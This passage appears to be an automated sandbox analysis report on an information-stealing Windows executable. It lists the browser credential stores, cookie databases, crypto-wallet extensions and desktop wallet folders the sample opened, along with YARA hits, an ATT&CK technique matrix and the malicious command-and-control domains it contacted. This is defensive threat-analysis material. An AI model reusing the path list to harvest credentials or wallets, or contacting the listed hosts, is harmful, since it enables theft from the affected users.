              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
              Source: Yara matchFile source: 00000003.00000003.2118733198.0000000001379000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2118075950.0000000001379000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2130598412.0000000001379000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2147992648.0000000001379000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2149945390.000000000137B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 4088, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 4088, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation
              1
              DLL Side-Loading
              211
              Process Injection
              12
              Virtualization/Sandbox Evasion
              1
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Screen Capture
              21
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell
              Boot or Logon Initialization Scripts1
              DLL Side-Loading
              211
              Process Injection
              LSASS Memory1
              Query Registry
              Remote Desktop Protocol1
              Archive Collected Data
              2
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Deobfuscate/Decode Files or Information
              Security Account Manager151
              Security Software Discovery
              SMB/Windows Admin Shares31
              Data from Local System
              113
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
              Obfuscated Files or Information
              NTDS12
              Virtualization/Sandbox Evasion
              Distributed Component Object Model2
              Clipboard Data
              Protocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
              Software Packing
              LSA Secrets1
              Process Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials11
              File and Directory Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync43
              System Information Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              file.exe32%ReversingLabsWin32.Infostealer.Tinba
              file.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
              https://duckduckgo.com/ac/?q=0%URL Reputationsafe
              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.0%URL Reputationsafe
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
              http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
              http://upx.sf.net0%URL Reputationsafe
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
              https://www.ecosia.org/newtab/0%URL Reputationsafe
              https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta0%URL Reputationsafe
              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
              https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
              https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg0%URL Reputationsafe
              https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0%URL Reputationsafe
              http://x1.c.lencr.org/00%URL Reputationsafe
              http://x1.i.lencr.org/00%URL Reputationsafe
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
              http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
              https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref0%URL Reputationsafe
              https://support.mozilla.org/products/firefoxgro.all0%URL Reputationsafe
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              forbidstow.site
              104.21.41.39
              truetrue
                unknown
                NameMaliciousAntivirus DetectionReputation
                servicedny.sitetrue
                  unknown
                  goalyfeastz.sitetrue
                    unknown
                    contemteny.sitetrue
                      unknown
                      opposezmny.sitetrue
                        unknown
                        authorisev.sitetrue
                          unknown
                          faulteyotk.sitetrue
                            unknown
                            https://forbidstow.site/apitrue
                              unknown
                              seallysl.sitetrue
                                unknown
                                forbidstow.sitetrue
                                  unknown
                                  dilemmadu.sitetrue
                                    unknown
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://duckduckgo.com/chrome_newtabfile.exe, 00000003.00000003.2102801748.000000000389B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.2102843367.0000000003898000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.2102957593.0000000003898000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://duckduckgo.com/ac/?q=file.exe, 00000003.00000003.2102801748.000000000389B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.2102843367.0000000003898000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.2102957593.0000000003898000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000003.00000003.2102801748.000000000389B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.2102843367.0000000003898000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.2102957593.0000000003898000.00000004.00000800.00020000.00000000.sdmpfalse
                                      unknown
                                      https://forbidstow.site/apiYfile.exe, 00000003.00000003.2118075950.000000000138D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.2130598412.000000000138D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        https://forbidstow.site:443/apilfile.exe, 00000003.00000003.2172599012.0000000001395000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.2150304942.000000000139C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.2130598412.000000000138D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYifile.exe, 00000003.00000003.2147992648.000000000138D000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.file.exe, 00000003.00000003.2148108007.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.2147992648.000000000138D000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000003.00000003.2102801748.000000000389B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.2102843367.0000000003898000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.2102957593.0000000003898000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://forbidstow.site/apilfile.exe, 00000003.00000003.2147992648.000000000138D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000003.00000003.2131010744.000000000388F000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://upx.sf.netAmcache.hve.6.drfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000003.00000003.2102801748.000000000389B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.2102843367.0000000003898000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.2102957593.0000000003898000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://ocsp.rootca1.amazontrust.com0:file.exe, 00000003.00000003.2131010744.000000000388F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                unknown
                                                https://www.ecosia.org/newtab/file.exe, 00000003.00000003.2102801748.000000000389B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.2102843367.0000000003898000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.2102957593.0000000003898000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&ctafile.exe, 00000003.00000003.2148108007.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.2147992648.000000000138D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
